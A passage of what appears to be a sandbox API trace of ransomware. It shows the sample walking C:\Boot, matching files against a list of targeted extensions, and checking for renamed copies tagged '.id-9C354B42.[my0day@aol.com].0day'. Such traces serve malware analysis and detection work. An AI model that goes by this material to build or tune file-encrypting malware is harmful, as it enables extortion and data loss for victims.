ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x2a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SY______.PFM", cAlternateFileName="")) returned 1 Thread: id = 15 os_tid = 0xacc [0032.928] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x10000) returned 0x3750f58 [0032.928] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x10000) returned 0x3760f60 [0032.929] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x10) returned 0x640398 [0032.929] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x6) returned 0x6430b8 [0032.929] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x10) returned 0x6403b0 [0032.929] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x100000) returned 0x3a60020 [0032.929] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x10) returned 0x6403c8 [0032.929] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6403c8, Size=0x20) returned 0x3720380 [0032.929] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x10) returned 0x6403c8 [0032.929] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6403c8, Size=0x20) returned 0x37203a8 [0032.929] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76c20000 [0032.929] GetProcAddress (hModule=0x76c20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76c4d650 [0032.929] Wow64DisableWow64FsRedirection (in: OldValue=0x301ff58 | out: OldValue=0x301ff58*=0x0) returned 1 [0032.929] lstrlenW (lpString="kernel32.dll") returned 12 [0032.929] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3720380 | out: hHeap=0x5f0000) returned 1 [0032.929] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0032.929] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x37203a8 | out: hHeap=0x5f0000) returned 1 [0032.929] Sleep (dwMilliseconds=0x64) [0033.078] lstrlenW (lpString="BCD") returned 3 [0033.078] CreateFileW (lpFileName="C:\\Boot\\BCD" (normalized: "c:\\boot\\bcd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0033.078] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0033.078] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0033.078] lstrlenW (lpString=".doc") returned 4 [0033.078] lstrcmpiW (lpString1=".doc", lpString2="\\BCD") returned -1 [0033.078] lstrlenW (lpString=".docx") returned 5 [0033.078] lstrcmpiW (lpString1=".docx", lpString2="t\\BCD") returned -1 [0033.078] lstrlenW (lpString=".pdf") returned 4 [0033.078] lstrcmpiW (lpString1=".pdf", lpString2="\\BCD") returned -1 [0033.078] lstrlenW (lpString=".xls") returned 4 [0033.078] lstrcmpiW (lpString1=".xls", lpString2="\\BCD") returned -1 [0033.078] lstrlenW (lpString=".xlsx") returned 5 [0033.078] lstrcmpiW (lpString1=".xlsx", lpString2="t\\BCD") returned -1 [0033.078] lstrlenW (lpString=".ppt") returned 4 [0033.079] lstrcmpiW (lpString1=".ppt", lpString2="\\BCD") returned -1 [0033.079] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0033.079] lstrlenW (lpString=".zip") returned 4 [0033.079] lstrcmpiW (lpString1=".zip", lpString2="\\BCD") returned -1 [0033.079] lstrlenW (lpString=".rar") returned 4 [0033.079] lstrcmpiW (lpString1=".rar", lpString2="\\BCD") returned -1 [0033.079] lstrlenW (lpString=".bz2") returned 4 [0033.079] lstrcmpiW (lpString1=".bz2", lpString2="\\BCD") returned -1 [0033.079] lstrlenW (lpString=".7z") returned 3 [0033.079] lstrcmpiW (lpString1=".7z", lpString2="BCD") returned -1 [0033.079] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0033.079] lstrlenW (lpString=".dbf") returned 4 [0033.079] lstrcmpiW (lpString1=".dbf", lpString2="\\BCD") returned -1 [0033.079] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0033.079] lstrlenW (lpString=".1cd") returned 4 [0033.079] lstrcmpiW (lpString1=".1cd", lpString2="\\BCD") returned -1 [0033.079] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0033.079] lstrlenW (lpString=".jpg") returned 4 [0033.079] lstrcmpiW (lpString1=".jpg", lpString2="\\BCD") returned -1 [0033.079] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0033.079] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0033.079] lstrlenW (lpString=".doc") returned 4 [0033.079] lstrcmpiW (lpString1=".doc", lpString2="\\BCD") returned -1 [0033.079] lstrlenW (lpString=".docx") returned 5 [0033.079] lstrcmpiW (lpString1=".docx", lpString2="t\\BCD") returned -1 [0033.079] lstrlenW (lpString=".pdf") returned 4 [0033.079] lstrcmpiW (lpString1=".pdf", lpString2="\\BCD") returned -1 [0033.079] lstrlenW (lpString=".xls") returned 4 [0033.079] lstrcmpiW (lpString1=".xls", lpString2="\\BCD") returned -1 [0033.079] lstrlenW (lpString=".xlsx") returned 5 [0033.079] lstrcmpiW (lpString1=".xlsx", lpString2="t\\BCD") returned -1 [0033.079] lstrlenW (lpString=".ppt") returned 4 [0033.080] lstrcmpiW (lpString1=".ppt", lpString2="\\BCD") returned -1 [0033.080] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0033.080] lstrlenW (lpString=".zip") returned 4 [0033.080] lstrcmpiW (lpString1=".zip", lpString2="\\BCD") returned -1 [0033.080] lstrlenW (lpString=".rar") returned 4 [0033.080] lstrcmpiW (lpString1=".rar", lpString2="\\BCD") returned -1 [0033.080] lstrlenW (lpString=".bz2") returned 4 [0033.080] lstrcmpiW (lpString1=".bz2", lpString2="\\BCD") returned -1 [0033.080] lstrlenW (lpString=".7z") returned 3 [0033.080] lstrcmpiW (lpString1=".7z", lpString2="BCD") returned -1 [0033.080] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0033.080] lstrlenW (lpString=".dbf") returned 4 [0033.080] lstrcmpiW (lpString1=".dbf", lpString2="\\BCD") returned -1 [0033.080] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0033.080] lstrlenW (lpString=".1cd") returned 4 [0033.080] lstrcmpiW (lpString1=".1cd", lpString2="\\BCD") returned -1 [0033.080] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0033.080] lstrlenW (lpString=".jpg") returned 4 [0033.080] lstrcmpiW (lpString1=".jpg", lpString2="\\BCD") returned -1 [0033.080] lstrcmpiW (lpString1=".LOG1", lpString2=".0day") returned 1 [0033.080] lstrlenW (lpString="BCD.LOG1") returned 8 [0033.080] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG1" (normalized: "c:\\boot\\bcd.log1"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0033.081] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x301ff1c | out: lpFileSize=0x301ff1c*=0) returned 1 [0033.081] CloseHandle (hObject=0x180) returned 1 [0033.081] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0033.081] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0033.081] lstrlenW (lpString=".doc") returned 4 [0033.081] lstrcmpiW (lpString1=".doc", lpString2="LOG1") returned -1 [0033.081] lstrlenW (lpString=".docx") returned 5 [0033.081] lstrcmpiW (lpString1=".docx", lpString2=".LOG1") returned -1 [0033.081] lstrlenW (lpString=".pdf") returned 4 [0033.081] lstrcmpiW (lpString1=".pdf", lpString2="LOG1") returned -1 [0033.081] lstrlenW (lpString=".xls") returned 4 [0033.081] lstrcmpiW (lpString1=".xls", lpString2="LOG1") returned -1 [0033.081] lstrlenW (lpString=".xlsx") returned 5 [0033.081] lstrcmpiW (lpString1=".xlsx", lpString2=".LOG1") returned 1 [0033.081] lstrlenW (lpString=".ppt") returned 4 [0033.081] lstrcmpiW (lpString1=".ppt", lpString2="LOG1") returned -1 [0033.081] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0033.081] lstrlenW (lpString=".zip") returned 4 [0033.081] lstrcmpiW (lpString1=".zip", lpString2="LOG1") returned -1 [0033.081] lstrlenW (lpString=".rar") returned 4 [0033.081] lstrcmpiW (lpString1=".rar", lpString2="LOG1") returned -1 [0033.081] lstrlenW (lpString=".bz2") returned 4 [0033.081] lstrcmpiW (lpString1=".bz2", lpString2="LOG1") returned -1 [0033.081] lstrlenW (lpString=".7z") returned 3 [0033.081] lstrcmpiW (lpString1=".7z", lpString2="OG1") returned -1 [0033.081] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0033.081] lstrlenW (lpString=".dbf") returned 4 [0033.081] lstrcmpiW (lpString1=".dbf", lpString2="LOG1") returned -1 [0033.081] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0033.081] lstrlenW (lpString=".1cd") returned 4 [0033.081] lstrcmpiW (lpString1=".1cd", lpString2="LOG1") returned -1 [0033.081] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0033.081] lstrlenW (lpString=".jpg") returned 4 [0033.082] lstrcmpiW (lpString1=".jpg", lpString2="LOG1") returned -1 [0033.082] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0033.082] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0033.082] lstrlenW (lpString=".doc") returned 4 [0033.082] lstrcmpiW (lpString1=".doc", lpString2="LOG1") returned -1 [0033.082] lstrlenW (lpString=".docx") returned 5 [0033.082] lstrcmpiW (lpString1=".docx", lpString2=".LOG1") returned -1 [0033.082] lstrlenW (lpString=".pdf") returned 4 [0033.082] lstrcmpiW (lpString1=".pdf", lpString2="LOG1") returned -1 [0033.082] lstrlenW (lpString=".xls") returned 4 [0033.082] lstrcmpiW (lpString1=".xls", lpString2="LOG1") returned -1 [0033.082] lstrlenW (lpString=".xlsx") returned 5 [0033.082] lstrcmpiW (lpString1=".xlsx", lpString2=".LOG1") returned 1 [0033.082] lstrlenW (lpString=".ppt") returned 4 [0033.082] lstrcmpiW (lpString1=".ppt", lpString2="LOG1") returned -1 [0033.082] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0033.082] lstrlenW (lpString=".zip") returned 4 [0033.082] lstrcmpiW (lpString1=".zip", lpString2="LOG1") returned -1 [0033.082] lstrlenW (lpString=".rar") returned 4 [0033.082] lstrcmpiW (lpString1=".rar", lpString2="LOG1") returned -1 [0033.082] lstrlenW (lpString=".bz2") returned 4 [0033.082] lstrcmpiW (lpString1=".bz2", lpString2="LOG1") returned -1 [0033.082] lstrlenW (lpString=".7z") returned 3 [0033.082] lstrcmpiW (lpString1=".7z", lpString2="OG1") returned -1 [0033.082] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0033.082] lstrlenW (lpString=".dbf") returned 4 [0033.082] lstrcmpiW (lpString1=".dbf", lpString2="LOG1") returned -1 [0033.082] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0033.082] lstrlenW (lpString=".1cd") returned 4 [0033.082] lstrcmpiW (lpString1=".1cd", lpString2="LOG1") returned -1 [0033.082] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0033.082] lstrlenW (lpString=".jpg") returned 4 [0033.082] lstrcmpiW (lpString1=".jpg", lpString2="LOG1") returned -1 [0033.083] lstrcmpiW (lpString1=".LOG2", lpString2=".0day") returned 1 [0033.083] lstrlenW (lpString="BCD.LOG2") returned 8 [0033.083] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG2" (normalized: "c:\\boot\\bcd.log2"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0033.083] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x301ff1c | out: lpFileSize=0x301ff1c*=0) returned 1 [0033.083] CloseHandle (hObject=0x180) returned 1 [0033.083] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0033.083] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0033.083] lstrlenW (lpString=".doc") returned 4 [0033.083] lstrcmpiW (lpString1=".doc", lpString2="LOG2") returned -1 [0033.083] lstrlenW (lpString=".docx") returned 5 [0033.083] lstrcmpiW (lpString1=".docx", lpString2=".LOG2") returned -1 [0033.083] lstrlenW (lpString=".pdf") returned 4 [0033.083] lstrcmpiW (lpString1=".pdf", lpString2="LOG2") returned -1 [0033.083] lstrlenW (lpString=".xls") returned 4 [0033.083] lstrcmpiW (lpString1=".xls", lpString2="LOG2") returned -1 [0033.083] lstrlenW (lpString=".xlsx") returned 5 [0033.083] lstrcmpiW (lpString1=".xlsx", lpString2=".LOG2") returned 1 [0033.083] lstrlenW (lpString=".ppt") returned 4 [0033.083] lstrcmpiW (lpString1=".ppt", lpString2="LOG2") returned -1 [0033.083] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0033.083] lstrlenW (lpString=".zip") returned 4 [0033.084] lstrcmpiW (lpString1=".zip", lpString2="LOG2") returned -1 [0033.084] lstrlenW (lpString=".rar") returned 4 [0033.084] lstrcmpiW (lpString1=".rar", lpString2="LOG2") returned -1 [0033.084] lstrlenW (lpString=".bz2") returned 4 [0033.084] lstrcmpiW (lpString1=".bz2", lpString2="LOG2") returned -1 [0033.084] lstrlenW (lpString=".7z") returned 3 [0033.084] lstrcmpiW (lpString1=".7z", lpString2="OG2") returned -1 [0033.084] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0033.084] lstrlenW (lpString=".dbf") returned 4 [0033.084] lstrcmpiW (lpString1=".dbf", lpString2="LOG2") returned -1 [0033.084] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0033.084] lstrlenW (lpString=".1cd") returned 4 [0033.084] lstrcmpiW (lpString1=".1cd", lpString2="LOG2") returned -1 [0033.084] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0033.084] lstrlenW (lpString=".jpg") returned 4 [0033.084] lstrcmpiW (lpString1=".jpg", lpString2="LOG2") returned -1 [0033.084] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0033.084] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0033.084] lstrlenW (lpString=".doc") returned 4 [0033.084] lstrcmpiW (lpString1=".doc", lpString2="LOG2") returned -1 [0033.084] lstrlenW (lpString=".docx") returned 5 [0033.084] lstrcmpiW (lpString1=".docx", lpString2=".LOG2") returned -1 [0033.084] lstrlenW (lpString=".pdf") returned 4 [0033.084] lstrcmpiW (lpString1=".pdf", lpString2="LOG2") returned -1 [0033.084] lstrlenW (lpString=".xls") returned 4 [0033.084] lstrcmpiW (lpString1=".xls", lpString2="LOG2") returned -1 [0033.084] lstrlenW (lpString=".xlsx") returned 5 [0033.084] lstrcmpiW (lpString1=".xlsx", lpString2=".LOG2") returned 1 [0033.084] lstrlenW (lpString=".ppt") returned 4 [0033.084] lstrcmpiW (lpString1=".ppt", lpString2="LOG2") returned -1 [0033.084] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0033.084] lstrlenW (lpString=".zip") returned 4 [0033.084] lstrcmpiW (lpString1=".zip", lpString2="LOG2") returned -1 [0033.085] lstrlenW (lpString=".rar") returned 4 [0033.085] lstrcmpiW (lpString1=".rar", lpString2="LOG2") returned -1 [0033.085] lstrlenW (lpString=".bz2") returned 4 [0033.085] lstrcmpiW (lpString1=".bz2", lpString2="LOG2") returned -1 [0033.085] lstrlenW (lpString=".7z") returned 3 [0033.085] lstrcmpiW (lpString1=".7z", lpString2="OG2") returned -1 [0033.085] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0033.085] lstrlenW (lpString=".dbf") returned 4 [0033.085] lstrcmpiW (lpString1=".dbf", lpString2="LOG2") returned -1 [0033.085] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0033.085] lstrlenW (lpString=".1cd") returned 4 [0033.085] lstrcmpiW (lpString1=".1cd", lpString2="LOG2") returned -1 [0033.085] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0033.085] lstrlenW (lpString=".jpg") returned 4 [0033.085] lstrcmpiW (lpString1=".jpg", lpString2="LOG2") returned -1 [0033.085] lstrcmpiW (lpString1=".mui", lpString2=".0day") returned 1 [0033.085] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0033.085] CreateFileW (lpFileName="C:\\Boot\\cs-CZ\\bootmgr.exe.mui" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0033.085] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x301ff1c | out: lpFileSize=0x301ff1c*=89168) returned 1 [0033.085] CloseHandle (hObject=0x180) returned 1 [0033.085] GetFileAttributesW (lpFileName="C:\\Boot\\cs-CZ\\bootmgr.exe.mui" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui")) returned 0x20 [0033.085] GetFileAttributesW (lpFileName="C:\\Boot\\cs-CZ\\bootmgr.exe.mui.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0033.086] CreateFileW (lpFileName="C:\\Boot\\cs-CZ\\bootmgr.exe.mui" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0033.086] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0033.086] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0033.086] lstrlenW (lpString=".doc") returned 4 [0033.086] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0033.086] lstrlenW (lpString=".docx") returned 5 [0033.086] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0033.086] lstrlenW (lpString=".pdf") returned 4 [0033.086] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0033.086] lstrlenW (lpString=".xls") returned 4 [0033.086] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0033.086] lstrlenW (lpString=".xlsx") returned 5 [0033.086] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0033.086] lstrlenW (lpString=".ppt") returned 4 [0033.086] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0033.086] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0033.086] lstrlenW (lpString=".zip") returned 4 [0033.086] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0033.086] lstrlenW (lpString=".rar") returned 4 [0033.086] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0033.086] lstrlenW (lpString=".bz2") returned 4 [0033.086] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0033.086] lstrlenW (lpString=".7z") returned 3 [0033.087] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0033.087] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0033.087] lstrlenW (lpString=".dbf") returned 4 [0033.087] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0033.087] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0033.087] lstrlenW (lpString=".1cd") returned 4 [0033.087] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0033.087] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0033.087] lstrlenW (lpString=".jpg") returned 4 [0033.087] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0033.087] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0033.087] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0033.087] lstrlenW (lpString=".doc") returned 4 [0033.087] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0033.087] lstrlenW (lpString=".docx") returned 5 [0033.087] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0033.087] lstrlenW (lpString=".pdf") returned 4 [0033.087] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0033.087] lstrlenW (lpString=".xls") returned 4 [0033.087] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0033.087] lstrlenW (lpString=".xlsx") returned 5 [0033.087] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0033.087] lstrlenW (lpString=".ppt") returned 4 [0033.087] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0033.087] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0033.087] lstrlenW (lpString=".zip") returned 4 [0033.087] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0033.087] lstrlenW (lpString=".rar") returned 4 [0033.087] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0033.087] lstrlenW (lpString=".bz2") returned 4 [0033.087] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0033.087] lstrlenW (lpString=".7z") returned 3 [0033.088] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0033.088] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0033.088] lstrlenW (lpString=".dbf") returned 4 [0033.088] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0033.088] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0033.088] lstrlenW (lpString=".1cd") returned 4 [0033.088] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0033.088] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0033.088] lstrlenW (lpString=".jpg") returned 4 [0033.088] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0033.088] lstrcmpiW (lpString1=".mui", lpString2=".0day") returned 1 [0033.088] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0033.088] CreateFileW (lpFileName="C:\\Boot\\da-DK\\bootmgr.exe.mui" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0033.088] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x301ff1c | out: lpFileSize=0x301ff1c*=87616) returned 1 [0033.088] CloseHandle (hObject=0x180) returned 1 [0033.088] GetFileAttributesW (lpFileName="C:\\Boot\\da-DK\\bootmgr.exe.mui" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui")) returned 0x20 [0033.088] GetFileAttributesW (lpFileName="C:\\Boot\\da-DK\\bootmgr.exe.mui.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0033.088] CreateFileW (lpFileName="C:\\Boot\\da-DK\\bootmgr.exe.mui" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0033.088] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0033.089] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0033.089] lstrlenW (lpString=".doc") returned 4 [0033.089] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0033.089] lstrlenW (lpString=".docx") returned 5 [0033.089] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0033.089] lstrlenW (lpString=".pdf") returned 4 [0033.089] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0033.089] lstrlenW (lpString=".xls") returned 4 [0033.089] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0033.089] lstrlenW (lpString=".xlsx") returned 5 [0033.089] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0033.089] lstrlenW (lpString=".ppt") returned 4 [0033.089] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0033.089] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0033.089] lstrlenW (lpString=".zip") returned 4 [0033.089] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0033.089] lstrlenW (lpString=".rar") returned 4 [0033.089] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0033.089] lstrlenW (lpString=".bz2") returned 4 [0033.089] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0033.089] lstrlenW (lpString=".7z") returned 3 [0033.089] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0033.089] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0033.089] lstrlenW (lpString=".dbf") returned 4 [0033.089] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0033.089] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0033.089] lstrlenW (lpString=".1cd") returned 4 [0033.089] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0033.089] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0033.089] lstrlenW (lpString=".jpg") returned 4 [0033.089] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0033.089] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0033.089] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0033.089] lstrlenW (lpString=".doc") returned 4 [0033.090] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0033.090] lstrlenW (lpString=".docx") returned 5 [0033.090] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0033.090] lstrlenW (lpString=".pdf") returned 4 [0033.090] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0033.090] lstrlenW (lpString=".xls") returned 4 [0033.090] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0033.090] lstrlenW (lpString=".xlsx") returned 5 [0033.090] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0033.090] lstrlenW (lpString=".ppt") returned 4 [0033.090] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0033.090] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0033.090] lstrlenW (lpString=".zip") returned 4 [0033.090] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0033.090] lstrlenW (lpString=".rar") returned 4 [0033.090] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0033.090] lstrlenW (lpString=".bz2") returned 4 [0033.090] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0033.090] lstrlenW (lpString=".7z") returned 3 [0033.090] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0033.090] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0033.090] lstrlenW (lpString=".dbf") returned 4 [0033.090] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0033.090] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0033.090] lstrlenW (lpString=".1cd") returned 4 [0033.090] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0033.090] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0033.090] lstrlenW (lpString=".jpg") returned 4 [0033.090] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0033.090] lstrcmpiW (lpString1=".mui", lpString2=".0day") returned 1 [0033.091] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0033.091] CreateFileW (lpFileName="C:\\Boot\\de-DE\\bootmgr.exe.mui" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0033.091] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x301ff1c | out: lpFileSize=0x301ff1c*=91712) returned 1 [0033.091] CloseHandle (hObject=0x180) returned 1 [0033.091] GetFileAttributesW (lpFileName="C:\\Boot\\de-DE\\bootmgr.exe.mui" (normalized: 